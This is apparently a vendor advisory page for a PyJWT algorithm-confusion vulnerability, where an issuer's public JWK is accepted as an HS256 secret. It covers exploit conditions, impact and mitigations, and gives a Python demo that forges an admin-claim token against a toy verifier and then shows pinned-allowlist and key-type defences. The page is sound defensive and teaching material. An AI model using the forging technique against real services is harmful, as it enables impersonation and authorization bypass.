CVE-2026-48526 · Severity: HIGH · CNA: GitHub_M

CVE-2026-48526: PyJWT: Public-key JWK accepted as HMAC secret enables forged HS256 tokens when mixed families are allowed

PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier decodes JSON Web Tokens while supporting both asymmetric and HMAC algorithms, the library does not validate the use of JSON Web Keys with HMAC algorithms, allowing an attacker to use the issuer's public key as the secret key for the HMAC algorithm. This vulnerability is fixed in 2.13.0.

HarborGuard Analysis

Synopsis

This is an algorithm-confusion vulnerability in PyJWT, a widely used Python JSON Web Token library. A remote, unauthenticated attacker takes the issuer's public key, which the verifier holds in JSON Web Key (JWK) form, and uses those bytes as the HMAC secret to mint an HS256-signed token. If the verifier hands that same key material to the decoder while allowing both an asymmetric algorithm (RS256, ES256) and HS256, the decoder recomputes the HMAC over the same public bytes and the signature check passes; no private key is ever needed, because the "secret" is public by design. Successful exploitation lets the attacker forge arbitrary JWT claims, enabling identity impersonation, authorization bypass, and access to protected data or actions. Note: the description references a fix in 2.13.0, but no fix version has been formally published to the advisory record yet; HarborGuard is tracking the advisory for confirmed patch availability.

HarborGuard Coverage

Detection: Available

Detection is available across every HarborGuard environment. As soon as the CVE record is ingested from upstream feeds (typically within minutes of publication), it is matched against all customer images containing the pyjwt package, including custom-built images that bundle the library directly.

Triage: Available

HarborGuard scores this finding at CVSS 7.4 HIGH using the recorded vector, and per-environment compliance policy weighting can escalate or suppress routing priority based on each organization's risk tolerance. Triage results are routed to the appropriate team inbox within each customer organization based on image ownership and policy configuration.

Patch: Pending upstream

Because no fix version has been formally confirmed in the advisory record, HarborGuard re-evaluates the advisory on every ingest cycle and will make a patched-image rebuild available the moment an upstream fix is published. For customers with auto-remediation enabled, the rebuild, regression run, and PR against affected workloads will be triggered automatically at that point.

Exploit Conditions

  • Network reachability: Required

    The attacker must reach the JWT-accepting service over the network; the AV:N vector means no local or physical access is required.

  • Authentication: Not required

    No credentials are needed; the attacker only requires the target server's public key, which is usually public by design (for example, served from a JWKS endpoint or embedded in client configuration).

  • Victim interaction: Not required

    No user action is needed; the attacker submits a crafted token directly to the service endpoint.

  • Attack complexity: High (AC:H)

    AC:H reflects preconditions rather than any cryptographic difficulty. The verifier must be configured to accept both an asymmetric algorithm and HS256 against the same key material, and the attacker must obtain the exact public key bytes the verifier holds: an HMAC over a re-encoded or reformatted copy of the key will not match, so the attacker has to guess the representation (JWK JSON, PEM, and so on) the server actually uses.

Blast Radius

  • Forged JWT claims allow the attacker to impersonate any user identity, including privileged accounts, without knowing any private key or password.
  • Authorization checks that rely on JWT-encoded roles or scopes are bypassed, granting access to protected API endpoints and data.
  • Confidential resources tied to authenticated sessions (user records, stored tokens, application data) become readable by the attacker.
  • Application data or state reachable through authenticated write operations can be modified using the forged token.

How HarborGuard Handles This

Available on HarborGuard: the CVE is matched against customer images as soon as it enters the ingest pipeline, covering both base images and custom builds that include pyjwt. Because no upstream fix version has been formally confirmed in the advisory record at this time, HarborGuard will continue re-checking the advisory on every ingest cycle. The moment a confirmed fix (expected at 2.13.0 based on the upstream description) is reflected in the advisory data, a patched-image rebuild at that version becomes available; for customers with auto-remediation enabled, this triggers a rebuild, a regression test run, and a PR opened against affected workloads. While no patch is confirmed, the primary compensating control is in application code: pass an explicit algorithms allowlist to the decoder that names only the asymmetric algorithm actually in use (for example RS256 alone), never a list that mixes RS/ES algorithms with HS ones, since the allowlist is what decides whether the HMAC path is reachable at all. Defence in depth on top of that: reject, in middleware or a Web Application Firewall rule, any token whose header alg is an HMAC algorithm (or none) before the library sees it when the deployment is intended to use only asymmetric keys, and apply network-policy rules to limit which services can present tokens to the verifier.
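To make the attack described in the synopsis and the controls above concrete, the following Python is an added example written for this page; it is not PyJWT's code and does not reproduce PyJWT's internals. It builds a minimal HS256 signer and verifier from the standard library, uses a constructed JWK with a placeholder modulus standing in for the issuer's public key, and shows that a verifier which hands that JWK to the decoder with a mixed allowlist accepts a token HMAC'd over the same bytes, while a verifier that pins the allowlist to RS256, or that refuses asymmetric key material as an HMAC secret (the class of check the upstream description says was missing), rejects it. The `looks_like_asymmetric_key` heuristic, the `decode` and `verify_outcome` helpers, and the sample claims are this example's own assumptions.

```python
import base64
import hashlib
import hmac
import json

# Constructed sample JWK standing in for the issuer's published RSA public key.
# The modulus is a placeholder, not a real key: for the confusion attack only
# the exact bytes the verifier holds matter, not their cryptographic value.
ISSUER_PUBLIC_JWK = json.dumps({
    "kty": "RSA",
    "use": "sig",
    "kid": "issuer-2026-01",
    "alg": "RS256",
    "n": "placeholder-modulus-not-a-real-key",
    "e": "AQAB",
})


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_hs256(claims: dict, secret: str) -> str:
    """Attacker side: mint an HS256 token keyed on whatever bytes are supplied.
    When `secret` is the issuer's public key material, this is the forgery."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode("utf-8"))
    payload = _b64url(json.dumps(claims).encode("utf-8"))
    signing_input = f"{header}.{payload}".encode("ascii")
    sig = hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def looks_like_asymmetric_key(key: str) -> bool:
    """Heuristic (this example's own): does the string look like public or
    private key material rather than a shared secret? Covers PEM blocks,
    OpenSSH public keys and JWKs whose kty is an asymmetric key type."""
    stripped = key.strip()
    if stripped.startswith("-----BEGIN "):
        return True
    if stripped.startswith(("ssh-rsa ", "ssh-ed25519 ", "ecdsa-sha2-")):
        return True
    try:
        jwk = json.loads(stripped)
    except ValueError:
        return False
    return isinstance(jwk, dict) and jwk.get("kty") in {"RSA", "EC", "OKP"}


def decode(token: str, key: str, algorithms: list, hardened: bool) -> dict:
    """Verifier side. The allowlist check comes first, as it should: if HS256 is
    not allowed the HMAC path is unreachable. Only the HMAC path is implemented
    because that is the path the forgery takes; a genuine RS256 token would
    need an RSA verify here, which is outside this demo."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    alg = header.get("alg")
    if alg not in algorithms:
        raise ValueError(f"alg {alg!r} not in allowlist {algorithms}")
    if alg != "HS256":
        raise NotImplementedError("asymmetric verification is outside this demo")
    if hardened and looks_like_asymmetric_key(key):
        # The fix class: refuse to treat public-key material as an HMAC secret.
        raise ValueError("refusing to use asymmetric key material as HMAC secret")
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(key.encode("utf-8"), signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("signature mismatch")
    return json.loads(_b64url_decode(payload_b64))


def verify_outcome(token: str, key: str, algorithms: list, hardened: bool):
    """Return ('accepted', claims) or ('rejected', reason) for easy checking."""
    try:
        return "accepted", decode(token, key, algorithms, hardened)
    except (ValueError, NotImplementedError) as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    forged = forge_hs256({"sub": "admin", "role": "superuser"}, ISSUER_PUBLIC_JWK)
    mixed = ["RS256", "HS256"]
    # Vulnerable: public JWK as key + mixed allowlist -> forged token accepted.
    print("vulnerable, mixed allowlist:", verify_outcome(forged, ISSUER_PUBLIC_JWK, mixed, hardened=False))
    # Mitigation 1: pin the allowlist to the asymmetric algorithm in use.
    print("pinned allowlist:          ", verify_outcome(forged, ISSUER_PUBLIC_JWK, ["RS256"], hardened=False))
    # Mitigation 2 (fix class): refuse asymmetric key material as HMAC secret.
    print("hardened, mixed allowlist: ", verify_outcome(forged, ISSUER_PUBLIC_JWK, mixed, hardened=True))
```

The order of checks in `decode` is the point worth carrying into real code: the allowlist is evaluated before any key handling, so a verifier that never lists HS256 is safe regardless of what the library does with JWK-shaped secrets, and the key-material check is a second line of defence for deployments that legitimately need both families.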


Metrics

CVSS v3.1: 7.4
Severity: HIGH
Fixed in: not yet recorded in the advisory data (2.13.0 per the upstream description)
Affected products: 1
Affected packages:
  • jpadilla / pyjwt, versions < 2.13.0
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N